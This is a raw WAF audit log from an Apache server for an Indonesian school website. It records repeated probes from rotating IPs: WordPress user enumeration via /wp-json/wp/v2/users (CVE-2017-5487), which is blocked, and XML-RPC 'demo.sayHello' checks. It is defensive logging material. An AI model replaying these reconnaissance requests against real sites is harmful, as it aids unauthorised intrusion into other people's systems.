Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --995bc619-Z-- --39c71e0d-A-- [17/May/2025:02:26:33 +0700] aCeRadhEtho3ciA0wehdZgAAAI8 103.236.140.4 53790 103.236.140.4 8181 --39c71e0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --39c71e0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39c71e0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423593993899 3184 (- - -) Stopwatch2: 1747423593993899 3184; combined=1363, p1=477, p2=856, p3=0, p4=0, p5=29, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39c71e0d-Z-- --41068636-A-- [17/May/2025:02:26:38 +0700] aCeRbthEtho3ciA0wehdaAAAAIw 103.236.140.4 53794 103.236.140.4 8181 --41068636-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41068636-C-- demo.sayHello --41068636-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41068636-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423598346252 6150 (- - -) Stopwatch2: 1747423598346252 6150; combined=4544, p1=521, p2=3718, p3=41, p4=41, p5=127, sr=70, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41068636-Z-- --5c494d67-A-- [17/May/2025:02:27:02 +0700] aCeRhthEtho3ciA0wehdagAAAIE 103.236.140.4 53800 103.236.140.4 8181 --5c494d67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5c494d67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c494d67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423622362900 2964 (- - -) Stopwatch2: 1747423622362900 2964; combined=1315, p1=460, p2=825, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c494d67-Z-- --0d0b6266-A-- [17/May/2025:02:27:08 +0700] aCeRjMe47ocjCGWTS4Y-5QAAAFQ 103.236.140.4 53810 103.236.140.4 8181 --0d0b6266-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0d0b6266-C-- demo.sayHello --0d0b6266-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d0b6266-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423628456216 4695 (- - -) Stopwatch2: 1747423628456216 4695; combined=3307, p1=485, p2=2650, p3=29, p4=29, p5=67, sr=99, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d0b6266-Z-- --c8d91976-A-- [17/May/2025:02:27:11 +0700] aCeRj9hEtho3ciA0wehdcQAAAIA 103.236.140.4 53818 103.236.140.4 8181 --c8d91976-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c8d91976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8d91976-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423631855872 2243 (- - -) Stopwatch2: 1747423631855872 2243; combined=1072, p1=341, p2=705, p3=0, p4=0, p5=26, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8d91976-Z-- --2ed51e21-A-- [17/May/2025:02:27:18 +0700] aCeRlse47ocjCGWTS4Y-5wAAAFI 103.236.140.4 53826 103.236.140.4 8181 --2ed51e21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ed51e21-C-- demo.sayHello --2ed51e21-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ed51e21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423638909908 5808 (- - -) Stopwatch2: 1747423638909908 5808; combined=4303, p1=579, p2=3487, p3=34, p4=47, p5=93, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ed51e21-Z-- --7c4bdf5c-A-- [17/May/2025:02:28:31 +0700] aCeR39e6THFz1hsaJaLZCwAAAAE 103.236.140.4 53856 103.236.140.4 8181 --7c4bdf5c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c4bdf5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c4bdf5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423711358166 2885 (- - -) Stopwatch2: 1747423711358166 2885; combined=1278, p1=427, p2=820, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c4bdf5c-Z-- --9a007800-A-- [17/May/2025:02:28:39 +0700] aCeR59hEtho3ciA0wehdfAAAAJY 103.236.140.4 53860 103.236.140.4 8181 --9a007800-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a007800-C-- demo.sayHello --9a007800-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a007800-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423719807192 6895 (- - -) Stopwatch2: 1747423719807192 6895; combined=4854, p1=661, p2=3913, p3=37, p4=39, p5=118, sr=126, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a007800-Z-- --f56b652f-A-- [17/May/2025:02:28:49 +0700] aCeR8de6THFz1hsaJaLZDAAAABg 103.236.140.4 53868 103.236.140.4 8181 --f56b652f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f56b652f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f56b652f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423729601280 14697 (- - -) Stopwatch2: 1747423729601280 14697; combined=25932, p1=396, p2=792, p3=0, p4=0, p5=12386, sr=68, sw=0, l=0, gc=12358 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f56b652f-Z-- --3b97675f-A-- [17/May/2025:02:28:55 +0700] aCeR99hEtho3ciA0wehdgAAAAII 103.236.140.4 53872 103.236.140.4 8181 --3b97675f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b97675f-C-- demo.sayHello --3b97675f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b97675f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423735417814 6403 (- - -) Stopwatch2: 1747423735417814 6403; combined=4605, p1=647, p2=3723, p3=37, p4=41, p5=94, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b97675f-Z-- --7c9ded15-A-- [17/May/2025:02:29:46 +0700] aCeSKthEtho3ciA0wehdggAAAIc 103.236.140.4 53876 103.236.140.4 8181 --7c9ded15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c9ded15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c9ded15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423786346886 3505 (- - -) Stopwatch2: 1747423786346886 3505; combined=1450, p1=501, p2=917, p3=0, p4=0, p5=31, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c9ded15-Z-- --f9a4121b-A-- [17/May/2025:02:29:55 +0700] aCeSM8e47ocjCGWTS4Y-6wAAAEI 103.236.140.4 53880 103.236.140.4 8181 --f9a4121b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9a4121b-C-- demo.sayHello --f9a4121b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a4121b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423795001171 6161 (- - -) Stopwatch2: 1747423795001171 6161; combined=4496, p1=547, p2=3708, p3=32, p4=37, p5=101, sr=76, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a4121b-Z-- --4727bb5d-A-- [17/May/2025:02:29:55 +0700] aCeSM9e6THFz1hsaJaLZDQAAABY 103.236.140.4 53882 103.236.140.4 8181 --4727bb5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4727bb5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4727bb5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423795652903 2117 (- - -) Stopwatch2: 1747423795652903 2117; combined=951, p1=334, p2=597, p3=0, p4=0, p5=20, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4727bb5d-Z-- --eeed9530-A-- [17/May/2025:02:29:57 +0700] aCeSNdhEtho3ciA0wehdhQAAAIg 103.236.140.4 53890 103.236.140.4 8181 --eeed9530-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eeed9530-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeed9530-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423797437020 2791 (- - -) Stopwatch2: 1747423797437020 2791; combined=1234, p1=421, p2=786, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeed9530-Z-- --0f0c0e4f-A-- [17/May/2025:02:30:01 +0700] aCeSOdhEtho3ciA0wehdhwAAAJM 103.236.140.4 53894 103.236.140.4 8181 --0f0c0e4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f0c0e4f-C-- demo.sayHello --0f0c0e4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f0c0e4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423801918821 6422 (- - -) Stopwatch2: 1747423801918821 6422; combined=4538, p1=605, p2=3635, p3=41, p4=41, p5=128, sr=77, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f0c0e4f-Z-- --6a384541-A-- [17/May/2025:02:30:04 +0700] aCeSPNe6THFz1hsaJaLZEAAAAAU 103.236.140.4 53900 103.236.140.4 8181 --6a384541-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a384541-C-- demo.sayHello --6a384541-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a384541-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423804618023 5476 (- - -) Stopwatch2: 1747423804618023 5476; combined=4096, p1=562, p2=3324, p3=28, p4=31, p5=89, sr=98, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a384541-Z-- --9523e345-A-- [17/May/2025:02:30:11 +0700] aCeSQ9hEtho3ciA0wehdiAAAAIw 103.236.140.4 53904 103.236.140.4 8181 --9523e345-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9523e345-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9523e345-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 